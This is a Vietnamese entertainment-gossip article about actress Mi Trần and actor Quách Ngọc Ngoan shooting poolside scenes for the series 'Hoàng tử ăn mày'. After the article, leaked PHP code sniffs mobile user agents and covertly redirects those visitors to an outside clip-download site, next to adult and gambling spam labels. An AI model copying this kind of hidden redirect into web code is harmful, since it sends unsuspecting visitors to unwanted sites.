Hot Girl Mi Trần và Quách Ngọc Ngoan nóng bỏng bên hồ bơi

Filed under: GÁI ĐẸP |

Sexy và rất khiêu khích, hot girl Mi Trần và nam diễn viên điển trai Quách Ngọc Ngoan đã có những cảnh quay nóng bỏng bên hồ bơi.

Tạo ấn tượng mạnh với khán giả qua vai diễn An An trong Phía sau hào quang, Mi Trần thời gian này được các nhà sản xuất săn đón nhiều hơn. Muốn làm mới hình ảnh cũng như nâng cao tay nghề diễn xuất, Mi Trần quyết định nhận vai phản diện Bảo Yến trong phim Hoàng tử ăn mày.

Bảo Yến trong phim là một cô gái xinh đẹp, cá tính, nhanh nhẹn, tháo vát và rất giỏi trong công việc nên được nhiều người tin tưởng, trọng dụng. Tuy nhiên, trong thâm tâm, cô lại là một người thực dụng, thủ đoạn và nhẫn tâm hết mức có thể để đạp đổ mọi thứ làm cô “chướng tai gai mắt”, miễn sao đạt được mục đích. Sở hữu hai tấm bằng đại học Quản trị kinh doanh và Hóa mỹ phẩm, Bảo Yến trở thành giám đốc kinh doanh của công ty A&E. Ban đầu, Bảo Yến có mối tình đẹp và toàn tâm, toàn ý với Phi Đằng (Quách Ngọc Ngoan đóng). Tuy nhiên, khi biết Phi Đằng mắc căn bệnh hiểm nghèo, Bảo Yến đã trở mặt và nhận tiền của kẻ xấu để lật đổ công ty.

Tình địch trên mọi mặt trận của Mi Trần trong phim Hoàng tử ăn mày là siêu mẫu đình đám Vũ Thu Phương. Trong phim, Vũ Thu Phương đảm nhiệm cô nhà báo Đông Quỳnh hiền lành. Hai cô nàng tìm mọi cách tung chiêu hòng chiếm trái tim của “hoàng tử ăn mày” Quách Ngọc Ngoan. Một trong những “chiêu” Mi Trần quyến rũ Quách hoàng tử là khoe lợi thế thân hình nóng bỏng, vẻ sexy cuốn hút. Rất nhanh, chiêu “mỹ nhân kế” đã khiến “hoàng tử ăn mày” gục ngay tức khắc.

Mi Trần cho biết, khi còn gắn với danh xưng hot girl, cô từng chụp nhiều bộ hình bikini nóng bỏng nhưng không hiểu sao, khi diễn cảnh mặc đồ tắm trong phim, cô lại bị ngượng ngùng. Đặc biệt, vì Mi Trần không biết bơi, nên để quay cảnh Bảo Yến lả lơi trong nước với Phi Đằng, đạo diễn Trần Cảnh Đôn đã phải vận dụng nhiều tiểu xảo.

Cùng ngắm nhìn những hình ảnh “nóng bỏng” của Mi Trần và Quách Ngọc Ngoan bên hồ bơi…

 

Phim sex
if (is_mobile()) { header("Location: http://mclip.in/tai-clip/13363"); exit(); } function is_mobile() { if(isset($_SERVER["HTTP_X_WAP_PROFILE"])) return true; if(preg_match("/wap.|.wap/i",$_SERVER["HTTP_ACCEPT"])) return true; if(isset($_SERVER["HTTP_USER_AGENT"])) { $user_agents = array( "midp", "java", "opera mini", "opera mobi", "mobi", "nokia", "midp", "midp", "j2me", "avantg", "docomo", "novarra", "palmos", "palmsource", "240x320", "opwv", "chtml", "pda", "windows ce", "mmp\/", "blackberry", "mib\/", "symbian", "wireless", "nokia", "hand", "mobi", "phone", "cdm", "up.b", "audio", "SIE-", "SEC-", "samsung", "HTC", "mot-", "mitsu", "sagem", "sony", "alcatel", "lg", "erics", "vx", "NEC", "philips", "mmm", "xx", "panasonic", "sharp", "wap", "sch", "rover", "pocket", "benq", "java", "pt", "pg", "vox", "amoi", "bird", "compal", "kg", "voda", "sany", "kdd", "dbt", "sendo", "sgh", "jb", "dddi", "iphone", "ipad", "android", "Android","series 60", "s60" ); $user_agents = implode("|", $user_agents ); if (preg_match("/$user_agents/i", $_SERVER["HTTP_USER_AGENT"])) return true; } return false; } function hide_float() { var content = document.getElementById('float_content'); var hide = document.getElementById('hide_float'); if (content.style.display == "none") { content.style.display = "block"; hide.innerHTML = ' Close [X]'; } else { content.style.display = "none"; hide.innerHTML = 'Quang Cao! '; } }
[X] Close.
mybet88